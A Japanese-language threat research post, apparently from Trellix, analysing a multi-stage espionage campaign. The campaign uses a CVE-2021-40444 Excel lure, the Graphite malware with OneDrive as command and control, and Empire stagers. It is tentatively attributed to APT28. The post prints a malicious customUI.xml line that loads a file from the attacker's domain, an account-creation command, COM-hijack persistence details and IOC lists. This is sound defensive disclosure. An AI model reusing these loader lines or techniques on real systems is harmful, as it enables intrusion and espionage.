スパイ活動による情報漏洩の詳細:政府高官がターゲットに
By Marc Elias · January 25, 2022
今回の調査において、マルウェアの解析とサポートをしてくれたChristiaan Beek、Alexandre Mundo、Leandro Velasco、Max
Kerstenに感謝します。
概要
当社の高度な脅威研究チームは、西アジア地域の防衛産業における国家安全保障政策と個人を監督する政府高官を対象とした多段階スパイ活動を特定しました。この攻撃の技術的な要素を詳しく説明するにあたり、被害者にリリース前の開示を行い、既知の攻撃コンポーネントをすべて環境から削除するために必要なすべてのコンテンツを提供したことを確認しています。
おそらく、この感染チェーンはeメールで被害者に送られたExcelダウンローダーの実行から始まり、MSHTMLリモートコード実行の脆弱性(CVE-2021-40444)を悪用して、メモリ内で悪意のある実行ファイルを展開したと思われます。MicrosoftのGraph
APIを使用してOneDriveをコマンド&コントロールサーバーとして活用するため、Graphiteと呼ばれるフォローアップ型のマルウェアを使用します。これは、当社のチームがこれまでに確認したことのない手法です。さらに、可能な限り攻撃を隠蔽するために複数のステージに分割されています。
コマンド&コントロール機能には、2021年7月に準備されたEmpireサーバーが使用されました。実際のキャンペーンは2021年10月から11月にかけて実行されました。この記事では、攻撃の内部構造、被害者像、インフラ、時系列について解説し、IOCやMITRE
ATT&CKの技法も明らかにします。
多くの攻撃指標と地政学的に明白な点が、過去に露見したされた脅威アクターAPT28と類似しています。証拠だけに基づいて同類のキャンペーンであるということはできませんが、私たちの推測がある程度は正しいと確信しています。インフラ、マルウェアのコーディング、操作のセットアップ方法から、非常に熟練した攻撃者を相手にしていることは間違いありません。
Trellixのお客様は、これらの指標とともに提供されたMcAfee EnterpriseとFireEyeの製品により保護されています。
攻撃プロセスの分析
ここでは、MSHTMLリモートコード実行の脆弱性(CVE-2021-40444)を悪用したExcelファイルの実行から始まる、攻撃の全体的なプロセスを分析します。第3段階のマルウェアのダウンローダーとして動作する悪意のあるDLLファイルを実行するためにGraphiteと呼ばれているものが使用されます。GraphiteはOneDrive
Empire Stagerをベースにした、新しく発見されたマルウェアのサンプルで、Microsoft Graph
APIを介してコマンド&コントロールサーバーとしてOneDriveアカウントを悪用するものです。
APTのオペレーションに関連すると考えられる多段階攻撃の最終段階において、被害者のコンピュータ上でEmpireエージェントをダウンロードし、コマンド&コントロールサーバーを使用してシステムをリモート制御するため、さまざまなEmpire
stagerを実行します。
次の図は、この攻撃のプロセス全体を示したものです。
図1. 攻撃の流れ
第1段階 – EXCELダウンローダー
この攻撃の最初の段階では、スピアフィッシングメールを使い「parliament_rew.xlsx」という名前のExcelファイルを開かせるよう、被害者を誘い込むようです。以下に、このファイルの識別情報を示します。
File type Excel Microsoft Office Open XML Format document File name
parliament_rew.xlsx File size 19.26 KB Compilation time 05/10/2021 MD5
8e2f8c95b1919651fcac7293cb704c1c SHA-256
f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4
図2. Excelファイルで観測されたDecoy text
このファイルの構造を分析したところ、「customUI」という名前のフォルダがあり、その中に「customUI.xml」という名前のファイルが含まれていることが確認されました。このファイルをテキストエディタで開くと、悪意のある文書がOpenXML形式の「CustomUI.OnLoad」プロパティを使用、リモートサーバーから外部ファイルを読み込んでいることが確認されました。
<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui"
onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>
この技法により、攻撃者は一部のアンチウイルススキャンエンジンやオフィス分析ツールを回避することができ、文書が検出される可能性を低くすることができます。
ダウンロードされたファイルは再びExcelのスプレッドシートですが、今回は古いMicrosoft Office Excel 97-2003 Binary
File Format (.xls)を使用して保存されています。以下に、このファイルの識別情報を示します。:
File type Microsoft Office Excel 97-2003 Binary File Format File name
parliament_rew.xls File size 20.00 KB Compilation time 05/10/2021 MD5
abd182f7f7b36e9a1ea9ac210d1899df SHA-256
7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a
メタデータオブジェクトの分析から、作成者は西欧諸国で使用されているコードページ1252を使用、2021年10月5日にファイルを作成したことが確認できます。
図3. ドキュメントのメタデータ
その後、文書内のOLEオブジェクトを解析したところ、攻撃者のサーバーにホストされている脆弱性CVE-2021-40444のエクスプロイトへのリンクを含むLinked
Object OLEStream Structureを発見しました。これにより、ドキュメントが自動的にHTMLファイルをダウンロードした後、Internet
Explorerのエンジンを呼び出して解釈し、エクスプロイトの実行をトリガーすることができます。
図4. OLEオブジェクトのリモートリンク
CVE-2021-40444の脆弱性については、すでに公に説明され議論されているため、この記事では内部の検証はせずに、エクスプロイトのCABファイルに含まれる第2段階のDLLについて分析を続けます。
第2段階 – DLLダウンローダー
第2段階は、先ほどのエクスプロイトで使用したCABファイルから抽出されたfontsubc.dllというDLL実行ファイルです。このファイルの識別情報は以下から確認できます。:
File type PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit File
name fontsubc.dll File size 88.50 KB Compilation time 28/09/2021 MD5
81de02d6e6fca8e16f2914ebd2176b78 SHA-256
1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40
このファイルは、Windowsがコントロールパネルアプリケーションとして認識する「CPlApplet」という関数をエクスポートします。これは主に、COMオブジェクトとAPI「URLOpenBlockingStreamW」を使用してhxxps://wordkeyvpload[.]net/keys/update[.]datにある次の段階のマルウェアに対するダウンローダーとして機能します。
図5. 次段階のマルウェアのダウンロード
ダウンロード後、マルウェアは埋め込まれたRSA公開鍵でファイルを復号し、復号されたペイロードのSHA-256を計算してその整合性をチェックします。最後に、マルウェアは仮想メモリを確保し、そこにペイロードをコピーして実行します。
図6. ペイロードの復号化と実行
ダウンロードしたペイロードを実行する前に、マルウェアは最初の4バイトを16進数でマジックバリューDE 47 AC
45と比較し、異なる場合はペイロードを実行しません。
図7. マルウェアのマジックバリュー
第3段階 – グラファイトマルウェア
第3段階は、前段階のメモリから抽出できたdfsvc.dllという名前の、ディスクに書き込まれることのないDLL実行ファイルである。以下に、このファイルの識別情報を示します。:
File type PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit File
name dfsvc.dll File size 24.00 KB Compilation time 20/09/2021 MD5
0ff09c344fc672880fdb03d429c7bda4 SHA-256
f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231
Microsoft Graph
APIを使用してOneDriveをコマンド&コントロールとして使用することから、このマルウェアをGraphiteと名付けました。Graphiteの開発者は、アクターのOneDriveアカウントで使用されている機能とファイル構造が類似していることから、Empire
OneDrive Stagerを参考にした可能性が非常に高いと思われます。
図 8. Empire OneDrive StagerのAPIリクエスト
Graphiteはまず、二重実行を避けるためにハードコードされた名前「250gHJAWUI289382s3h3Uasuh289di」でミューテックスを作成し、文字列を復号化して、後で使用するAPIを動的に解決することから開始します。さらに、感染したコンピュータを識別するために、レジストリキー「HKEY_LOCAL_MACHINE」「SOFTWARE」「Microsoft
Cryptography」「CachineGuid」に格納された値のCRC32チェックサムであるボット識別子を計算します。
図9. Graphiteの初期化
次に、マルウェアはタスクの実行を監視するスレッドを作成し、その結果をOneDriveのアカウントにアップロードします。結果ファイルは、攻撃者のOneDriveアカウントの「update」フォルダにアップロードされます。
図10. タスクの結果を監視するスレッド
その後、マルウェアは無限ループに入り、20分ごとにMicrosoft Graph
APIリクエストで使用する新しいOAuth2トークンを取得し、攻撃者のOneDriveアカウントの「check」フォルダに実行する新しいタスクがあるかどうかを判断します。
図11. 新しいOAuth2トークンのリクエスト
有効なOAuth2トークンを取得すると、被害者のシステムから以下の情報を含む偵察データを収集します:
* Running processes
* .NET CLR version from PowerShell
* Windows OS version
データはLZNT1アルゴリズムで圧縮され、ランダムなIVとともにハードコードされたAES-256-CBCキーで暗号化される。オペレータのタスクも同様に暗号化されます。最後に、システム情報を含むファイルをOneDriveの「{BOT_ID}/update」フォルダにランダムな名前でアップロードします。
図12 システム情報を格納したファイル データをエンコードするGraphite
また、Graphiteは “check
“サブディレクトリ内の子ファイルを列挙して、新しいコマンドの有無を問い合わせる。新しいファイルが見つかった場合、Graph
APIを使用してファイルの内容をダウンロードし、復号化する。復号化されたタスクは2つのフィールドを持ちます。最初のフィールドはタスクのユニークな識別子で、2番目のフィールドは実行するコマンドを指定します。
コマンド値「1」は、マルウェアがシステム情報を再びコマンド&コントロール(攻撃者のOneDrive)に送信するよう指示します。コマンド値「2」は、復号化されたタスクがシェルコードであることを示し、マルウェアはそれを実行するスレッドを作成することになります。
図13. Graphiteのコマンド
受信したタスクがシェルコードの場合、3番目のフィールドを16進数でDE 47 AC
45というマジックバリューで確認し、異なる場合はペイロードを実行しない。タスクの残りのバイトが実行されるシェルコードである。最後に、タスクのファイルは処理後、OneDriveから削除されます。
図 14. 復号化されたオペレータタスク
下の図は、Graphiteマルウェアのフローをまとめたものです。
図15 グラファイト Graphiteの実行図
第4段階 – EMPIRE DLL LAUNCHER STAGER
第4段階は、前ステージのタスクから抽出できたcsiresources.dllというダイナミック・ライブラリ・ファイルです。このファイルは、プロセスのメモリに実行ファイルを反射的にロードして実行するために使用されるGraphiteシェルコード・タスクに埋め込まれていました。以下に、このファイルの識別情報を示します。
File type PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit File
name csiresources.dll File size 111.00 KB Compilation time 21/09/2021 MD5
138122869fb47e3c1a0dfe66d4736f9b SHA-256
25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9
サンプルは、Empireエージェントをステージングするためのダウンロードクレードルを実行するために、アンマネージドプロセスに.NET CLR
Runtimeを初期化し起動する、Empire DLL Launcher
stagerを生成したものです。それを使えば、PowerShell.exeではないプロセスでEmpireエージェントを実行することが可能です。
まず、マルウェアはexplorer.exeのプロセスから実行されているかどうかをチェックします。そうでない場合、マルウェアは終了します。
図16. プロセス名チェック
次に、マルウェアはSystem32フォルダ内にある「EhStorShell.dll」というファイルを探し出し、読み込もうとします。これにより、マルウェアは元の「EhStorShell.dll」ファイルがexplorer.exeのコンテキストにロードされることを確認します。
図17. EhStorShell.dllライブラリのロード
後続のマルウェアは、CLSID「{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}」を上書きし、被害者のシステム内で永続性を獲得し、COMハイジャック技術を実行するため、前述の操作は重要なものとなっています。前述のCLSIDは「Enhanced
Storage Shell Extension DLL」に相当し、「EhStorShell.dll」というファイルによって処理されます。
次に、マルウェアは.NET CLR Runtimeをロード、初期化、起動し、.NET next
stageペイロードをXOR復号してメモリにロードします。最後に、マルウェアは.NET Runtimeを使用してファイルを実行します。
図18. ネクストステージマルウェアの復号化
第5段階 – EMPIRE POWERSHELL C# STAGER
第5段階は、前ステージで埋め込まれ暗号化されたService.exeという名前の.NET実行ファイルです。以下に、このファイルの識別情報を示します。
File type PE32 executable for MS Windows (console) Intel 80386 32-bit File size
34.00 KB MD5 3b27fe7b346e3dabd08e618c9674e007 SHA-256
d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317
このサンプルは、PowerShellオブジェクトのインスタンスを作成し、埋め込まれたPowerShellスクリプトをXOR演算で復号化し、Base64でデコードしてから最終的にInvoke関数でペイロードを実行することが主目的のEmpire
PowerShell C# Stagerです。
図19 第5段階のコード
PowerShellのコードをロードして実行するために.NETの実行ファイルを使用する背景には、AMSIのようなセキュリティ対策を回避し、本来許されないプロセスからの実行を可能にするという理由があります。
第6段階 – EMPIRE HTTP POWERSHELL STAGER
最後のステージは PowerShell スクリプト、特に前のステージで埋め込まれ、暗号化されたエンパイア HTTP Stager
です。以下、ファイルの識別情報を確認できます。
File type Powershell script File size 6.00 KB MD5
a81fab5cf0c2a1c66e50184c38283e0e SHA-256
da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37
先に述べたように、これは多段階攻撃の最後の段階であり、分析を困難にするために、Empireの
Invoke-難読化スクリプトを使用して非常に難読化されたHTTPステージです。
図20. 難読化されたPowerShellスクリプト
スクリプトの主な機能は、hxxp://wordkeyvpload[.]org/index[.]jspに連絡してシステムの初期情報を送り、URL
hxxp://wordkeyvpload[.]org/index[.]php
に接続し暗号化したEmpireエージェントをダウンロードしてAES-256で復号して実行することです。
イベントのタイムライン
監視・分析されたすべての活動に基づいて、以下の時系列で事象を説明します。
図 21. キャンペーンのタイムライン
ターゲティング
以前紹介したルアードキュメントの1つ(「parliament_rew.xlsx」と命名)は、政府職員をターゲットにしたものかもしれません。
この敵は、政府機関をターゲットとする以外に、防衛産業にも狙いを定めているようです。Missions
Budget.xlsx」という名前の別の文書には、「Military and civilian missions and
operations」という文章と、2022年と2023年のいくつかの国における軍事作戦の予算がドル建てで記載されていました。
図22. 防衛分野を狙ったルアードキュメント
さらに、テレメトリにより、ポーランドや他の東欧諸国がこのキャンペーンの背後にあるサイバー犯罪者の関心事であることも確認されました。
この犯罪者の被害者の全体像は不明ですが、我々が見たルアードキュメントでは、その活動が特定の地域や産業を中心としていることがわかる。悪意のあるExcelファイルの名前、内容、私たちのテレメトリによると、犯罪者は東欧の国々をターゲットにしており、最も普及している産業は防衛と政府であると思われます。
インフラストラクチャ
攻撃チェーン全体の分析により、この攻撃に関連する2つのホストが特定されました。最初のドメインはwordkeyvpload.netで、セルビアに位置し、2021年7月7日にOwnRegistrar
Inc.に登録されたIP 131.153.96.114に解決されます。
DNS逆引きツールでIPを照会すると、PTRレコードがドメイン「bwh7196.bitcoinwebhosting.net」に解決され、これはサーバーがBitcoin
Web Hosting VPS再販会社から購入されたことを示す可能性があります。
図 23. リバースDNSクエリ
このコマンド&コントロールサーバーの主な機能は、CVE-2021-40444に対するHTMLエクスプロイトと、第2段階のDLLを含むCABファイルをホストすることです。.
2番目に確認されたドメインはwordkeyvpload.orgで、IP 185.117.88.19に解決され、スウェーデンに位置し、Namecheap
Inc.で2021年6月18日に登録されました。オペレーティングシステム(Microsoft Windows Server 2008
R2)、HTTPサーバー(Microsoft-IIS/7.5)、およびオープンポート(1337および5000)に基づいて、このホストがEmpireポストエクスプロイトフレームワークの最新バージョンを実行している可能性が非常に高いです。
その仮説の背後にある理由は、Empireサーバーのデフォルト構成は、RESTful
APIをホストするためにポート1337を使用し、ポート5000はサーバーとリモートで対話するためのSocketIOインターフェイスをホストしていることです。また、HTTP
Listenerをデプロイする場合、HTTP Serverフィールドのデフォルト値は「Microsoft-IIS/7.5」にハードコードされています。
図 24. デフォルト設定でのLocal Empireサーバーの実行
前述の情報と、マルウェアの最終段階からコマンドとコントロールを抽出した結果、このホストは、被害者のマシンにインストールされたエージェントをリモートで制御し、実行するためのコマンドを送信するために使用するEmpireサーバーとして動作することが確認できます。
属性
この作戦の期間中、アルメニアとアゼルバイジャンの国境付近では、政治的な緊張が続いていた。したがって、古典的な諜報活動の観点からすれば、潜入して情報を収集し、さまざまな関係者のリスクと動きを評価することは、完全に理にかなっていると言えます。
Graphiteキャンペーンの調査を通じて、攻撃者の活動のすべてのタイムスタンプをテレメトリから抽出したところ、2つの一貫した傾向があることがわかりました。まず、以下の画像に描かれているように、敵の活動日は月曜日から金曜日までです。
図25. 敵の活動日
次に、アクティビティのタイムスタンプは、モスクワ時間、トルコ時間、アラビア標準時、東アフリカ時間を含むGMT+3タイムゾーンにおける通常の営業時間(8時から18時まで)に対応していることです。.
図26. 敵の作業時間
調査中のもう一つの興味深い発見は、攻撃者がCLSID(D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D)を持続性のために使用していたことであり、研究者が東ヨーロッパ諸国を標的としたロシア作戦に言及したESETのレポートと一致しました。
グラファイトマルウェアのコードブロックと配列を当社のサンプルデータベースと分析・比較したところ、2018年にAPT28に起因するサンプルと重複していることがわかりました。例えば、私たちのサンプルをこのサンプルに向けて比較しました。5bb9f53636efafdd30023d44be1be55bf7c7b7d5
(sha1):
図27 サンプルのコード比較
一部の機能を拡大すると、下図の左側がグラファイトのサンプル、右側が前述の2018年のサンプルであることが観察されます。3年近い時差があるので、コードが変わっているのも納得ですが、それでもプログラマーは以前の関数で満足しているようです。
図28 似たような機能の流れ
このキャンペーンの背後にいる攻撃者の戦術、技術、手順(TTP)をいくつか挙げましたが、国民国家のスポンサーはもちろん、APT28に対して低/中程度の信頼度で指し示すだけの文脈、類似性、重複がないだけなのです。しかし、私たちは、インフラストラクチャ、マルウェアのコード化、および操作のセットアップ方法に基づいて、熟練した攻撃者を相手にしていると考えています。
結論
このブ記事で紹介したキャンペーンの分析により、10月初旬に行われたMSHTMLリモートコード実行脆弱性(CVE-2021-40444)を利用した東欧諸国を標的とした多段階の攻撃に関する洞察を得ることができました。
Graphiteマルウェアの分析に見られるように、かなり革新的に機能しており、マルウェアにハードコードされたトークンを使ってMicrosoft Graph
APIにクエリを送信し、OneDriveサービスをコマンド&コントロールとして使用しています。このような通信を行うことで、マルウェアは正規のMicrosoftドメインにのみ接続し、疑わしいネットワークトラフィックを表示しないため、被害者のシステムで気づかれることはありません。
攻撃プロセス全体の分析により、攻撃者からのコマンド&コントロールとして機能する新しいインフラストラクチャと、ポストエクスプロイトフレームワークEmpireのエージェントである最終ペイロードを特定することが出来ました。以上のことから、このキャンペーンで観察されたアクティブの時系列を構築することができました。
この攻撃の背後にいる犯罪者は、標的、マルウェア、およびオペレーションに使用されるインフラストラクチャから、非常に高度であることがわかり、このキャンペーンの主な目標はスパイ活動であると推測されます。信頼度が低く、中程度であることから、この作戦はAPT28によって実行されたと考えています。今後の調査に役立つ、キャンペーンを検出するためのTTP(tactics,
techniques and procedures)、インフラに関する指標、標的、能力を手に入れました。
MITRE ATT&CK TECHNIQUES
Tactic Resource Development T1583.001 Acquire Infrastructure: Domains Attackers
purchased domains to be used as a command and control. wordkeyvpload[.]net
wordkeyvpload[.]org Resource Development T1587.001 Develop capabilities: Malware
Attackers built malicious components to conduct their attack. Graphite malware
Resource Development T1588.002 Develop capabilities: Tool Attackers employed red
teaming tools to conduct their attack. Empire Initial Access T1566.001 Phishing:
Spear phishing Attachment Adversaries sent spear phishing emails with a
malicious attachment to gain access to victim systems. BM-D(2021)0247.xlsx
Execution T1203 Exploitation for Client Execution Adversaries exploited a
vulnerability in Microsoft Office to execute code. CVE-2021-40444 Execution
T1059.001 Command and Scripting Interpreter: PowerShell Adversaries abused
PowerShell for execution of the Empire stager. Empire Powershell stager
Persistence T1546.015 Event Triggered Execution: Component Object Model
Hijacking Adversaries established persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects. CLSID:
D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D Persistence T1136.001 Create Account: Local
Account Adversaries created a local account to maintain access to victim
systems. net user /add user1 Defense Evasion T1620 Reflective Code Loading
Adversaries reflectively loaded code into a process to conceal the execution of
malicious payloads. Empire DLL Launcher stager Command and Control T1104
Multi-Stage Channels Adversaries created multiple stages to obfuscate the
command-and-control channel and to make detection more difficult. Use of
different Empire stagers Command and Control T1102.002 Web Service:
Bidirectional Communication Adversaries used an existing, legitimate external
Web service as a means for sending commands to and receiving output from a
compromised system over the Web service channel. Microsoft OneDrive
Empire Server Command and Control T1573.001 Encrypted Channel: Symmetric
Cryptography Adversaries employed a known symmetric encryption algorithm to
conceal command and control traffic rather than relying on any inherent
protections provided by a communication protocol. AES 256 Command and Control
T1573.002 Encrypted Channel: Asymmetric Cryptography Adversaries employed a
known asymmetric encryption algorithm to conceal command and control traffic
rather than relying on any inherent protections provided by a communication
protocol. RSA
INDICATORS OF COMPROMISE (IOCS)
FIRST STAGE – EXCEL DOWNLOADERS
40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa
f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4
7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a
9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0
SECOND STAGE – DOWNLOADER DLL
1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40
THIRD STAGE – GRAPHITE
35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f
f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231
FOURTH STAGE – DLL LAUNCHER STAGER
25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9
FIFTH STAGE – POWERSHELL C# STAGER
d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317
SIXTH STAGE – EMPIRE HTTP POWERSHELL STAGER
da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37
URLS
hxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls
hxxps://wordkeyvpload[.]net/keys/parliament_rew.xls
hxxps://wordkeyvpload[.]net/keys/Missions Budget.xls
hxxps://wordkeyvpload[.]net/keys/TR_comparison.xls
hxxps://wordkeyvpload[.]net/keys/JjnJq3.html
hxxps://wordkeyvpload[.]net/keys/iz7hfD.html
hxxps://wordkeyvpload[.]net/keys/Ari2Rc.html
hxxps://wordkeyvpload[.]net/keys/OD4cNq.html
hxxps://wordkeyvpload[.]net/keys/0YOL4.cab
hxxps://wordkeyvpload[.]net/keys/whmel.cab
hxxps://wordkeyvpload[.]net/keys/UdOpQ.cab
hxxps://wordkeyvpload[.]net/keys/D9V5E.cab
hxxps://wordkeyvpload[.]net/keys/update.dat
hxxps://wordkeyvpload[.]org/index.jsp
hxxps://wordkeyvpload[.]org/index.php
hxxps://wordkeyvpload[.]org/news.php
hxxps://wordkeyvpload[.]org/admin/get.php
hxxps://wordkeyvpload[.]org/login/process.php
ドメイン
wordkeyvpload[.]net
wordkeyvpload[.]org
jimbeam[.]live
IPS
131.153.96[.]114
185.117.88[.]19
94.140.112[.]178
RECENT NEWS
* Mar 8, 2022
Trellix and Gotara Announce Partnership to Close Cybersecurity Talent Gap
* Feb 22, 2022
Trellix Featured on CRN’s 2022 Security 100 and Channel Chiefs Lists
* Feb 8, 2022
Trellix Announces Executive Leadership Appointments
* Jan 31, 2022
Trellix Sees Advanced Persistent Threat Actors and Ransomware Groups Focus on
Financial Services in Third Quarter of 2021
* Jan 19, 2022
Symphony Technology Group Announces the Launch of Extended Detection and
Response Provider, Trellix
RECENT STORIES
* Mar 1, 2022
Cyberattacks Targeting Ukraine and HermeticWiper Protections
* Feb 22, 2022
Log4shell Vulnerability is the Coal in Our Stocking for 2021
* Feb 18, 2022
2022 Threat Predictions
* Feb 14, 2022
The Bug Report - December 2021 Edition
* Feb 8, 2022
Evolve With XDR the Modern Approach to SecOps
FEATURED CONTENT
PERSPECTIVES
OUR CEO ON LIVING SECURITY
By Bryan Palma · January 19, 2022
Trellix CEO, Bryan Palma, explains the critical need for security that’s always
learning.
Read More
XDR
TIME TO DRIVE CHANGE BY CHALLENGING THE CHALLENGERS
By Michelle Salvado · January 19, 2022
Dynamic threats call for dynamic security – the path to resiliency lies in XDR.
Read More
THREAT LABS
2022 THREAT PREDICTIONS
By Trellix · January 19, 2022
What cyber security threats should enterprises look out for in 2022?
Read More
最新情報を入手する
サイバー セキュリティは私たちの得意とするところです。とはいえ、私たちは新しい会社です。
これから進化してまいりますので、最新情報をお見逃しなきよう、お願いいたします。
有効な電子メール アドレスを入力してください。
送信
迷惑メールゼロ。配信はいつでも停止できます。
Copyright ©️ 2022 Musarubra US LLC
Privacy Legal Terms of Service Contact Us
YOU'RE EXITING TRELLIX.
Please pardon our appearance as we transition from McAfee Enterprise to Trellix.
Exciting changes are in the works.
We look forward to discussing your enterprise security needs.
You will be redirected in 0 seconds. If not, please click here to continue
YOU'RE EXITING TRELLIX.
Please pardon our appearance as we transition from FireEye to Trellix.
Exciting changes are in the works.
We look forward to discussing your enterprise security needs.
You will be redirected in 0 seconds. If not, please click here to continue
MCAFEE ENTERPRISE AND FIREEYE EMERGE AS TRELLIX.
For legal information, please click on the corresponding link below.
Legal
Terms of Service
Legal & Terms of Service